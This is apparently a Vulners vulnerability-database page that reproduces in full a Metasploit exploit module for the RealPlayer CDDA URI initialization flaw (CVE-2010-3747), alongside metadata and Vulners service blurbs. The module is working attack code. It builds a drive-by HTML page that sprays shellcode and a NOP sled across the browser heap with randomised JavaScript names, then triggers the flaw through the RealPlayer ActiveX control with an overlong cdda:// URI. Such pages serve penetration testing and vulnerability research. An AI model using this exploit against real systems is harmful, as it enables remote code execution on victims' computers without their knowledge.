Lucene search
K

RealNetworks RealPlayer CDDA URI Initialization Vulnerability

🗓️ 17 Mar 2011 15:42:28Reported by bannedit <[email protected]>, sinn3r <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 20 Views

RealPlayer CDDA URI Initialization Vulnerability in version 11/11.1 and SP 1.0 - 1.1.4 allows object initialization failure, leading to uninitialized memory executio

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'RealNetworks RealPlayer CDDA URI Initialization Vulnerability',
      'Description'    => %q{
          This module exploits an initialization flaw within RealPlayer 11/11.1 and
        RealPlayer SP 1.0 - 1.1.4. An abnormally long CDDA URI causes an object
        initialization failure. However, this failure is improperly handled and
        uninitialized memory executed.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'bannedit',
          'sinn3r'
        ],
      'References'     =>
        [
          [ 'CVE', '2010-3747' ],
          [ 'OSVDB', '68673'],
          [ 'BID', '44144' ],
          [ 'ZDI', '10-210'],
          [ 'URL', 'http://service.real.com/realplayer/security/10152010_player/en/']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'    => 1000,
          'BadChars' => "\x00",
        },
      'Platform' => 'win',
      'Targets'        =>
        [
          [ 'RealPlayer SP 1.0 - 1.1.4 Universal',     { 'Ret' => 0x21212121 } ],
          [ 'RealPlayer 11.0 - 11.1 Universal',        { 'Ret' => 0x21212121 } ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2010-11-15',
      'DefaultTarget'  => 0))
  end

  def on_request_uri(cli, request)
    # Re-generate the payload
    return if ((p = regenerate_payload(cli)) == nil)

    mytarget = target

    # the ret slide gets executed via call [esi+45b]
    retslide = [mytarget.ret].pack('V') * 750
    cdda_uri = "cdda://" +  retslide

    # Encode the shellcode
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
    nops = make_nops(8)
    nop_sled = Rex::Text.to_unescape(nops, Rex::Arch.endian(target.arch))

    # Randomize Javascript variables
    var_blocks    = rand_text_alpha(rand(6)+3)
    var_shellcode = rand_text_alpha(rand(6)+3)
    var_index     = rand_text_alpha(rand(6)+3)
    var_nopsled   = rand_text_alpha(rand(6)+3)
    spray_func    = rand_text_alpha(rand(6)+3)
    obj_id        = rand_text_alpha(rand(6)+3)
    randnop       = rand_text_alpha(rand(100) + 1)
    html = <<-EOS
<html>
<head>
<script>
function #{spray_func}() {
  #{var_blocks} = new Array();
  var #{var_shellcode} = unescape("#{shellcode}");
  var #{randnop} = "#{nop_sled}";
  var #{var_nopsled} = unescape(#{randnop});
  do { #{var_nopsled} += #{var_nopsled} } while (#{var_nopsled}.length < 8200);
    for (#{var_index}=0; #{var_index} < 19000; #{var_index}++)
      #{var_blocks}[#{var_index}] = #{var_nopsled} + #{var_shellcode};
  }
#{spray_func}();
</script>
</head>
<object id=#{obj_id} classid='clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA' width=0 height=0>
<param name="CONTROLS" value="ControlPanel">
<param name="src" value="#{cdda_uri}">
</object>
<script language="VBScript">
#{obj_id}.DoPlay
</script>
</html>
EOS
    print_status("Sending #{self.name} HTML")
    send_response(cli, html, { 'Content-Type' => 'text/html' })
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
0.5Low risk
Vulners AI Score0.5
CVSS 29.3
EPSS0.35352
20